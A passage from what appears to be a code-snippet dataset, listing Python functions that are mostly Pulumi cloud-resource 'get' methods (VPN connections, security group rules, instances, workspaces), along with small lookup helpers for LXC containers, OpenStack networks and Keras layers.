Optional[pulumi.Input[pulumi.InputType['VpnConnectionTunnel2LogOptionsArgs']]] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnConnectionVgwTelemetryArgs']]]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None) -> 'VpnConnection':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _VpnConnectionState.__new__(_VpnConnectionState)\n\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"core_network_arn\"] = core_network_arn\n __props__.__dict__[\"core_network_attachment_arn\"] = core_network_attachment_arn\n __props__.__dict__[\"customer_gateway_configuration\"] = customer_gateway_configuration\n __props__.__dict__[\"customer_gateway_id\"] = customer_gateway_id\n __props__.__dict__[\"enable_acceleration\"] = enable_acceleration\n __props__.__dict__[\"local_ipv4_network_cidr\"] = local_ipv4_network_cidr\n __props__.__dict__[\"local_ipv6_network_cidr\"] = local_ipv6_network_cidr\n __props__.__dict__[\"outside_ip_address_type\"] = outside_ip_address_type\n __props__.__dict__[\"remote_ipv4_network_cidr\"] = remote_ipv4_network_cidr\n __props__.__dict__[\"remote_ipv6_network_cidr\"] = remote_ipv6_network_cidr\n __props__.__dict__[\"routes\"] = routes\n __props__.__dict__[\"static_routes_only\"] = static_routes_only\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"transit_gateway_attachment_id\"] = transit_gateway_attachment_id\n __props__.__dict__[\"transit_gateway_id\"] = transit_gateway_id\n __props__.__dict__[\"transport_transit_gateway_attachment_id\"] = transport_transit_gateway_attachment_id\n __props__.__dict__[\"tunnel1_address\"] = tunnel1_address\n __props__.__dict__[\"tunnel1_bgp_asn\"] = tunnel1_bgp_asn\n __props__.__dict__[\"tunnel1_bgp_holdtime\"] = tunnel1_bgp_holdtime\n __props__.__dict__[\"tunnel1_cgw_inside_address\"] = tunnel1_cgw_inside_address\n __props__.__dict__[\"tunnel1_dpd_timeout_action\"] = tunnel1_dpd_timeout_action\n __props__.__dict__[\"tunnel1_dpd_timeout_seconds\"] = tunnel1_dpd_timeout_seconds\n __props__.__dict__[\"tunnel1_enable_tunnel_lifecycle_control\"] = tunnel1_enable_tunnel_lifecycle_control\n __props__.__dict__[\"tunnel1_ike_versions\"] = tunnel1_ike_versions\n __props__.__dict__[\"tunnel1_inside_cidr\"] = tunnel1_inside_cidr\n __props__.__dict__[\"tunnel1_inside_ipv6_cidr\"] = tunnel1_inside_ipv6_cidr\n __props__.__dict__[\"tunnel1_log_options\"] = tunnel1_log_options\n __props__.__dict__[\"tunnel1_phase1_dh_group_numbers\"] = tunnel1_phase1_dh_group_numbers\n __props__.__dict__[\"tunnel1_phase1_encryption_algorithms\"] = tunnel1_phase1_encryption_algorithms\n __props__.__dict__[\"tunnel1_phase1_integrity_algorithms\"] = tunnel1_phase1_integrity_algorithms\n __props__.__dict__[\"tunnel1_phase1_lifetime_seconds\"] = tunnel1_phase1_lifetime_seconds\n __props__.__dict__[\"tunnel1_phase2_dh_group_numbers\"] = tunnel1_phase2_dh_group_numbers\n __props__.__dict__[\"tunnel1_phase2_encryption_algorithms\"] = tunnel1_phase2_encryption_algorithms\n __props__.__dict__[\"tunnel1_phase2_integrity_algorithms\"] = tunnel1_phase2_integrity_algorithms\n __props__.__dict__[\"tunnel1_phase2_lifetime_seconds\"] = tunnel1_phase2_lifetime_seconds\n __props__.__dict__[\"tunnel1_preshared_key\"] = tunnel1_preshared_key\n __props__.__dict__[\"tunnel1_rekey_fuzz_percentage\"] = tunnel1_rekey_fuzz_percentage\n __props__.__dict__[\"tunnel1_rekey_margin_time_seconds\"] = tunnel1_rekey_margin_time_seconds\n __props__.__dict__[\"tunnel1_replay_window_size\"] = tunnel1_replay_window_size\n __props__.__dict__[\"tunnel1_startup_action\"] = tunnel1_startup_action\n __props__.__dict__[\"tunnel1_vgw_inside_address\"] = tunnel1_vgw_inside_address\n __props__.__dict__[\"tunnel2_address\"] = tunnel2_address\n __props__.__dict__[\"tunnel2_bgp_asn\"] = tunnel2_bgp_asn\n __props__.__dict__[\"tunnel2_bgp_holdtime\"] = tunnel2_bgp_holdtime\n __props__.__dict__[\"tunnel2_cgw_inside_address\"] = tunnel2_cgw_inside_address\n __props__.__dict__[\"tunnel2_dpd_timeout_action\"] = tunnel2_dpd_timeout_action\n __props__.__dict__[\"tunnel2_dpd_timeout_seconds\"] = tunnel2_dpd_timeout_seconds\n __props__.__dict__[\"tunnel2_enable_tunnel_lifecycle_control\"] = tunnel2_enable_tunnel_lifecycle_control\n __props__.__dict__[\"tunnel2_ike_versions\"] = tunnel2_ike_versions\n __props__.__dict__[\"tunnel2_inside_cidr\"] = tunnel2_inside_cidr\n __props__.__dict__[\"tunnel2_inside_ipv6_cidr\"] = tunnel2_inside_ipv6_cidr\n __props__.__dict__[\"tunnel2_log_options\"] = tunnel2_log_options\n __props__.__dict__[\"tunnel2_phase1_dh_group_numbers\"] = tunnel2_phase1_dh_group_numbers\n __props__.__dict__[\"tunnel2_phase1_encryption_algorithms\"] = tunnel2_phase1_encryption_algorithms\n __props__.__dict__[\"tunnel2_phase1_integrity_algorithms\"] = tunnel2_phase1_integrity_algorithms\n __props__.__dict__[\"tunnel2_phase1_lifetime_seconds\"] = tunnel2_phase1_lifetime_seconds\n __props__.__dict__[\"tunnel2_phase2_dh_group_numbers\"] = tunnel2_phase2_dh_group_numbers\n __props__.__dict__[\"tunnel2_phase2_encryption_algorithms\"] = tunnel2_phase2_encryption_algorithms\n __props__.__dict__[\"tunnel2_phase2_integrity_algorithms\"] = tunnel2_phase2_integrity_algorithms\n __props__.__dict__[\"tunnel2_phase2_lifetime_seconds\"] = tunnel2_phase2_lifetime_seconds\n __props__.__dict__[\"tunnel2_preshared_key\"] = tunnel2_preshared_key\n __props__.__dict__[\"tunnel2_rekey_fuzz_percentage\"] = tunnel2_rekey_fuzz_percentage\n __props__.__dict__[\"tunnel2_rekey_margin_time_seconds\"] = tunnel2_rekey_margin_time_seconds\n __props__.__dict__[\"tunnel2_replay_window_size\"] = tunnel2_replay_window_size\n __props__.__dict__[\"tunnel2_startup_action\"] = tunnel2_startup_action\n __props__.__dict__[\"tunnel2_vgw_inside_address\"] = tunnel2_vgw_inside_address\n __props__.__dict__[\"tunnel_inside_ip_version\"] = tunnel_inside_ip_version\n __props__.__dict__[\"type\"] = type\n __props__.__dict__[\"vgw_telemetries\"] = vgw_telemetries\n __props__.__dict__[\"vpn_gateway_id\"] = vpn_gateway_id\n return VpnConnection(resource_name, opts=opts, __props__=__props__)",
"def state(name, path=None):\n # Don't use _ensure_exists() here, it will mess with _change_state()\n\n cachekey = f\"lxc.state.{name}{path}\"\n try:\n return __context__[cachekey]\n except KeyError:\n if not exists(name, path=path):\n __context__[cachekey] = None\n else:\n cmd = \"lxc-info\"\n if path:\n cmd += f\" -P {shlex.quote(path)}\"\n cmd += f\" -n {name}\"\n ret = __salt__[\"cmd.run_all\"](cmd, python_shell=False)\n if ret[\"retcode\"] != 0:\n _clear_context()\n raise CommandExecutionError(\n f\"Unable to get state of container '{name}'\"\n )\n c_infos = ret[\"stdout\"].splitlines()\n c_state = None\n for c_info in c_infos:\n stat = c_info.split(\":\")\n if stat[0].lower() == \"state\":\n c_state = stat[1].strip().lower()\n break\n __context__[cachekey] = c_state\n return __context__[cachekey]",
"def __get_state_attr(self, prefix):\n try:\n return getattr(self, prefix + str(self.__state))\n except AttributeError:\n return getattr(self, prefix + \"default\")",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]]] = None,\n read_write_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]] = None,\n readonly_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n role: Optional[pulumi.Input[str]] = None,\n server_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'FailoverGroup':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _FailoverGroupState.__new__(_FailoverGroupState)\n\n __props__.__dict__[\"databases\"] = databases\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"partner_servers\"] = partner_servers\n __props__.__dict__[\"read_write_endpoint_failover_policy\"] = read_write_endpoint_failover_policy\n __props__.__dict__[\"readonly_endpoint_failover_policy\"] = readonly_endpoint_failover_policy\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"role\"] = role\n __props__.__dict__[\"server_name\"] = server_name\n __props__.__dict__[\"tags\"] = tags\n return FailoverGroup(resource_name, opts=opts, __props__=__props__)",
"async def station(id_or_name):\n with open(\"/data/station_data.json\") as j:\n data = json.load(j)\n # if id is passe\n if id_or_name in data:\n return data[id_or_name]\n # if name is passed\n for _, v in data.items():\n if v[\"name\"] == id_or_name:\n return v\n # if no match is found\n raise HTTPException(status_code=404, detail=\"Station not found\")",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'FirewallRule':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = dict()\n\n __props__[\"end_ip\"] = None\n __props__[\"name\"] = None\n __props__[\"start_ip\"] = None\n __props__[\"type\"] = None\n return FirewallRule(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n direction: Optional[pulumi.Input[str]] = None,\n ethertype: Optional[pulumi.Input[str]] = None,\n port_range_max: Optional[pulumi.Input[int]] = None,\n port_range_min: Optional[pulumi.Input[int]] = None,\n protocol: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n remote_group_id: Optional[pulumi.Input[str]] = None,\n remote_ip_prefix: Optional[pulumi.Input[str]] = None,\n security_group_id: Optional[pulumi.Input[str]] = None,\n tenant_id: Optional[pulumi.Input[str]] = None) -> 'SecGroupRule':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _SecGroupRuleState.__new__(_SecGroupRuleState)\n\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"direction\"] = direction\n __props__.__dict__[\"ethertype\"] = ethertype\n __props__.__dict__[\"port_range_max\"] = port_range_max\n __props__.__dict__[\"port_range_min\"] = port_range_min\n __props__.__dict__[\"protocol\"] = protocol\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"remote_group_id\"] = remote_group_id\n __props__.__dict__[\"remote_ip_prefix\"] = remote_ip_prefix\n __props__.__dict__[\"security_group_id\"] = security_group_id\n __props__.__dict__[\"tenant_id\"] = tenant_id\n return SecGroupRule(resource_name, opts=opts, __props__=__props__)",
"def get_net_details(self, net_name=\"dummy_net\", net_id=None):\n _url = \"http://\" + self.host_ip + \":9696/v2.0/networks\"\n _headers = {'x-auth-token': self.project_info[\"token_project\"]}\n _body = None\n\n result = self.request(\"GET\", _url, _headers, _body)\n if result is None:\n LOG_OBJ.error(\"No response from Server while listing the nets\")\n return result.status\n if result.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get network Failed with status %s \" % result.status)\n return result.status\n output = json.loads(result.data)\n\n for nets in output['networks']:\n if (net_id is not None and (nets['id'] == net_id)) or \\\n nets['name'].lower() == net_name.lower():\n LOG_OBJ.debug(\"Net details : %s \" % nets)\n return nets\n\n LOG_OBJ.debug(\"Network with name:%s or with ID:%s is Not Found\" %\n (net_name, net_id))",
"def from_esi_name(cls, esi_state_name: str) -> \"Structure.State\":\n STATES_ESI_MAP = {\n \"anchor_vulnerable\": cls.ANCHOR_VULNERABLE,\n \"anchoring\": cls.ANCHORING,\n \"armor_reinforce\": cls.ARMOR_REINFORCE,\n \"armor_vulnerable\": cls.ARMOR_VULNERABLE,\n \"deploy_vulnerable\": cls.DEPLOY_VULNERABLE,\n \"fitting_invulnerable\": cls.FITTING_INVULNERABLE,\n \"hull_reinforce\": cls.HULL_REINFORCE,\n \"hull_vulnerable\": cls.HULL_VULNERABLE,\n \"online_deprecated\": cls.ONLINE_DEPRECATED,\n \"onlining_vulnerable\": cls.ONLINING_VULNERABLE,\n \"shield_vulnerable\": cls.SHIELD_VULNERABLE,\n \"unanchored\": cls.UNANCHORED,\n \"offline\": cls.POS_OFFLINE,\n \"online\": cls.POS_ONLINE,\n \"onlining\": cls.POS_ONLINING,\n \"reinforced\": cls.POS_REINFORCED,\n \"unanchoring \": cls.POS_UNANCHORING,\n }\n return (\n STATES_ESI_MAP[esi_state_name]\n if esi_state_name in STATES_ESI_MAP\n else cls.UNKNOWN\n )",
"def format_state(data):\n if us.states.lookup(data) is None:\n return None\n else:\n return us.states.lookup(data).name",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n add_on: Optional[pulumi.Input[pulumi.InputType['InstanceAddOnArgs']]] = None,\n arn: Optional[pulumi.Input[str]] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n blueprint_id: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n cpu_count: Optional[pulumi.Input[int]] = None,\n created_at: Optional[pulumi.Input[str]] = None,\n ip_address_type: Optional[pulumi.Input[str]] = None,\n ipv6_address: Optional[pulumi.Input[str]] = None,\n ipv6_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n is_static_ip: Optional[pulumi.Input[bool]] = None,\n key_pair_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n public_ip_address: Optional[pulumi.Input[str]] = None,\n ram_size: Optional[pulumi.Input[float]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_data: Optional[pulumi.Input[str]] = None,\n username: Optional[pulumi.Input[str]] = None) -> 'Instance':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _InstanceState.__new__(_InstanceState)\n\n __props__.__dict__[\"add_on\"] = add_on\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"availability_zone\"] = availability_zone\n __props__.__dict__[\"blueprint_id\"] = blueprint_id\n __props__.__dict__[\"bundle_id\"] = bundle_id\n __props__.__dict__[\"cpu_count\"] = cpu_count\n __props__.__dict__[\"created_at\"] = created_at\n __props__.__dict__[\"ip_address_type\"] = ip_address_type\n __props__.__dict__[\"ipv6_address\"] = ipv6_address\n __props__.__dict__[\"ipv6_addresses\"] = ipv6_addresses\n __props__.__dict__[\"is_static_ip\"] = is_static_ip\n __props__.__dict__[\"key_pair_name\"] = key_pair_name\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"private_ip_address\"] = private_ip_address\n __props__.__dict__[\"public_ip_address\"] = public_ip_address\n __props__.__dict__[\"ram_size\"] = ram_size\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"user_data\"] = user_data\n __props__.__dict__[\"username\"] = username\n return Instance(resource_name, opts=opts, __props__=__props__)",
"def get_by_state(self, pool_name, states, all=False):\n\t\tif not all:\n\t\t\tfor mission in getattr(self, pool_name).values():\n\t\t\t\tif mission.state in states:\n\t\t\t\t\treturn mission\n\t\t\treturn None\n\t\telse:\n\t\t\toutput = []\n\t\t\tfor mission in getattr(self, pool_name).values():\n\t\t\t\tif mission.state in states:\n\t\t\t\t\toutput.append(mission)\n\t\t\treturn output",
"def state_id(id):\n flag = 0\n states = storage.all(State).values()\n for state in states:\n if state.id == id:\n flag = 1\n break\n return render_template('9-states.html', state=state, flag=flag)",
"def getNetworkById(self, session: Session, id_: str):\n try:\n return NetworkManager().getNetworkById(session, id_)\n except TortugaException as ex:\n raise\n except Exception as ex:\n self._logger.exception(str(ex))\n raise TortugaException(exception=ex)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'FhirStore':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = FhirStoreArgs.__new__(FhirStoreArgs)\n\n __props__.__dict__[\"complex_data_type_reference_parsing\"] = None\n __props__.__dict__[\"dataset_id\"] = None\n __props__.__dict__[\"default_search_handling_strict\"] = None\n __props__.__dict__[\"disable_referential_integrity\"] = None\n __props__.__dict__[\"disable_resource_versioning\"] = None\n __props__.__dict__[\"enable_update_create\"] = None\n __props__.__dict__[\"fhir_store_id\"] = None\n __props__.__dict__[\"labels\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"notification_config\"] = None\n __props__.__dict__[\"notification_configs\"] = None\n __props__.__dict__[\"project\"] = None\n __props__.__dict__[\"stream_configs\"] = None\n __props__.__dict__[\"validation_config\"] = None\n __props__.__dict__[\"version\"] = None\n return FhirStore(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n cidr: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n publish_cidr_route: Optional[pulumi.Input[bool]] = None,\n transit_router_cidr_id: Optional[pulumi.Input[str]] = None,\n transit_router_cidr_name: Optional[pulumi.Input[str]] = None,\n transit_router_id: Optional[pulumi.Input[str]] = None) -> 'TransitRouterCidr':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _TransitRouterCidrState.__new__(_TransitRouterCidrState)\n\n __props__.__dict__[\"cidr\"] = cidr\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"publish_cidr_route\"] = publish_cidr_route\n __props__.__dict__[\"transit_router_cidr_id\"] = transit_router_cidr_id\n __props__.__dict__[\"transit_router_cidr_name\"] = transit_router_cidr_name\n __props__.__dict__[\"transit_router_id\"] = transit_router_id\n return TransitRouterCidr(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n action: Optional[pulumi.Input[str]] = None,\n layer_name: Optional[pulumi.Input[str]] = None,\n organization_id: Optional[pulumi.Input[str]] = None,\n policy: Optional[pulumi.Input[str]] = None,\n principal: Optional[pulumi.Input[str]] = None,\n revision_id: Optional[pulumi.Input[str]] = None,\n statement_id: Optional[pulumi.Input[str]] = None,\n version_number: Optional[pulumi.Input[int]] = None) -> 'LayerVersionPermission':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _LayerVersionPermissionState.__new__(_LayerVersionPermissionState)\n\n __props__.__dict__[\"action\"] = action\n __props__.__dict__[\"layer_name\"] = layer_name\n __props__.__dict__[\"organization_id\"] = organization_id\n __props__.__dict__[\"policy\"] = policy\n __props__.__dict__[\"principal\"] = principal\n __props__.__dict__[\"revision_id\"] = revision_id\n __props__.__dict__[\"statement_id\"] = statement_id\n __props__.__dict__[\"version_number\"] = version_number\n return LayerVersionPermission(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n business_status: Optional[pulumi.Input[str]] = None,\n create_time: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n expired_time: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n ipv6_gateway_id: Optional[pulumi.Input[str]] = None,\n ipv6_gateway_name: Optional[pulumi.Input[str]] = None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n spec: Optional[pulumi.Input[str]] = None,\n status: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None) -> 'Ipv6Gateway':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _Ipv6GatewayState.__new__(_Ipv6GatewayState)\n\n __props__.__dict__[\"business_status\"] = business_status\n __props__.__dict__[\"create_time\"] = create_time\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"expired_time\"] = expired_time\n __props__.__dict__[\"instance_charge_type\"] = instance_charge_type\n __props__.__dict__[\"ipv6_gateway_id\"] = ipv6_gateway_id\n __props__.__dict__[\"ipv6_gateway_name\"] = ipv6_gateway_name\n __props__.__dict__[\"resource_group_id\"] = resource_group_id\n __props__.__dict__[\"spec\"] = spec\n __props__.__dict__[\"status\"] = status\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"vpc_id\"] = vpc_id\n return Ipv6Gateway(resource_name, opts=opts, __props__=__props__)",
"def get_node(self, state):\n return self.nodes.get(Node.state_as_string(state))",
"def resolve_from_local_lookup_table(self, id: str) -> GeoLocation:\n return self.local_lookup(id)",
"def get_layer(self, name=None, index=None):\n # TODO(fchollet): We could build a dictionary based on layer names\n # since they are constant, but we have not done that yet.\n if index is not None:\n if len(self.layers) <= index:\n raise ValueError('Was asked to retrieve layer at index ' + str(index) +\n ' but model only has ' + str(len(self.layers)) +\n ' layers.')\n else:\n return self.layers[index]\n else:\n if not name:\n raise ValueError('Provide either a layer name or layer index.')\n for layer in self.layers:\n if layer.name == name:\n return layer\n raise ValueError('No such layer: ' + name)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n arn: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n destination_cidr_block: Optional[pulumi.Input[str]] = None,\n destination_port_range: Optional[pulumi.Input[pulumi.InputType['TrafficMirrorFilterRuleDestinationPortRangeArgs']]] = None,\n protocol: Optional[pulumi.Input[int]] = None,\n rule_action: Optional[pulumi.Input[str]] = None,\n rule_number: Optional[pulumi.Input[int]] = None,\n source_cidr_block: Optional[pulumi.Input[str]] = None,\n source_port_range: Optional[pulumi.Input[pulumi.InputType['TrafficMirrorFilterRuleSourcePortRangeArgs']]] = None,\n traffic_direction: Optional[pulumi.Input[str]] = None,\n traffic_mirror_filter_id: Optional[pulumi.Input[str]] = None) -> 'TrafficMirrorFilterRule':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _TrafficMirrorFilterRuleState.__new__(_TrafficMirrorFilterRuleState)\n\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"destination_cidr_block\"] = destination_cidr_block\n __props__.__dict__[\"destination_port_range\"] = destination_port_range\n __props__.__dict__[\"protocol\"] = protocol\n __props__.__dict__[\"rule_action\"] = rule_action\n __props__.__dict__[\"rule_number\"] = rule_number\n __props__.__dict__[\"source_cidr_block\"] = source_cidr_block\n __props__.__dict__[\"source_port_range\"] = source_port_range\n __props__.__dict__[\"traffic_direction\"] = traffic_direction\n __props__.__dict__[\"traffic_mirror_filter_id\"] = traffic_mirror_filter_id\n return TrafficMirrorFilterRule(resource_name, opts=opts, __props__=__props__)",
"def get(self, state):\n return state[self.primary or self]",
"def get_subnet(self, name_or_id, filters=None):\n if not filters:\n filters = {}\n return self.network.find_subnet(\n name_or_id=name_or_id, ignore_missing=True, **filters\n )",
"def get(self, filter='assigned', state='open', labels=None,\r\n sort='created', direction='desc', since=None, format=None,\r\n page=None, per_page=None):\r\n url = self.get_url()\r\n params = base.get_params(\r\n ('filter', 'state', 'labels', 'sort', 'direction',\r\n 'since', 'page', 'per_page'), locals())\r\n\r\n headers = resource.mimetype_accept(format)\r\n\r\n return http.Request('GET', url, params, headers), parsers.parse_json",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n application_insights_id: Optional[pulumi.Input[str]] = None,\n container_registry_id: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n discovery_url: Optional[pulumi.Input[str]] = None,\n encryption: Optional[pulumi.Input[pulumi.InputType['WorkspaceEncryptionArgs']]] = None,\n friendly_name: Optional[pulumi.Input[str]] = None,\n high_business_impact: Optional[pulumi.Input[bool]] = None,\n identity: Optional[pulumi.Input[pulumi.InputType['WorkspaceIdentityArgs']]] = None,\n image_build_compute_name: Optional[pulumi.Input[str]] = None,\n key_vault_id: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n primary_user_assigned_identity: Optional[pulumi.Input[str]] = None,\n public_access_behind_virtual_network_enabled: Optional[pulumi.Input[bool]] = None,\n public_network_access_enabled: Optional[pulumi.Input[bool]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n sku_name: Optional[pulumi.Input[str]] = None,\n storage_account_id: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n v1_legacy_mode_enabled: Optional[pulumi.Input[bool]] = None,\n workspace_id: Optional[pulumi.Input[str]] = None) -> 'Workspace':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _WorkspaceState.__new__(_WorkspaceState)\n\n __props__.__dict__[\"application_insights_id\"] = application_insights_id\n __props__.__dict__[\"container_registry_id\"] = container_registry_id\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"discovery_url\"] = discovery_url\n __props__.__dict__[\"encryption\"] = encryption\n __props__.__dict__[\"friendly_name\"] = friendly_name\n __props__.__dict__[\"high_business_impact\"] = high_business_impact\n __props__.__dict__[\"identity\"] = identity\n __props__.__dict__[\"image_build_compute_name\"] = image_build_compute_name\n __props__.__dict__[\"key_vault_id\"] = key_vault_id\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"primary_user_assigned_identity\"] = primary_user_assigned_identity\n __props__.__dict__[\"public_access_behind_virtual_network_enabled\"] = public_access_behind_virtual_network_enabled\n __props__.__dict__[\"public_network_access_enabled\"] = public_network_access_enabled\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"sku_name\"] = sku_name\n __props__.__dict__[\"storage_account_id\"] = storage_account_id\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"v1_legacy_mode_enabled\"] = v1_legacy_mode_enabled\n __props__.__dict__[\"workspace_id\"] = workspace_id\n return Workspace(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'Machine':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = MachineArgs.__new__(MachineArgs)\n\n __props__.__dict__[\"ad_fqdn\"] = None\n __props__.__dict__[\"agent_configuration\"] = None\n __props__.__dict__[\"agent_upgrade\"] = None\n __props__.__dict__[\"agent_version\"] = None\n __props__.__dict__[\"client_public_key\"] = None\n __props__.__dict__[\"cloud_metadata\"] = None\n __props__.__dict__[\"detected_properties\"] = None\n __props__.__dict__[\"display_name\"] = None\n __props__.__dict__[\"dns_fqdn\"] = None\n __props__.__dict__[\"domain_name\"] = None\n __props__.__dict__[\"error_details\"] = None\n __props__.__dict__[\"extensions\"] = None\n __props__.__dict__[\"identity\"] = None\n __props__.__dict__[\"last_status_change\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"location_data\"] = None\n __props__.__dict__[\"machine_fqdn\"] = None\n __props__.__dict__[\"mssql_discovered\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"os_name\"] = None\n __props__.__dict__[\"os_profile\"] = None\n __props__.__dict__[\"os_sku\"] = None\n __props__.__dict__[\"os_type\"] = None\n __props__.__dict__[\"os_version\"] = None\n 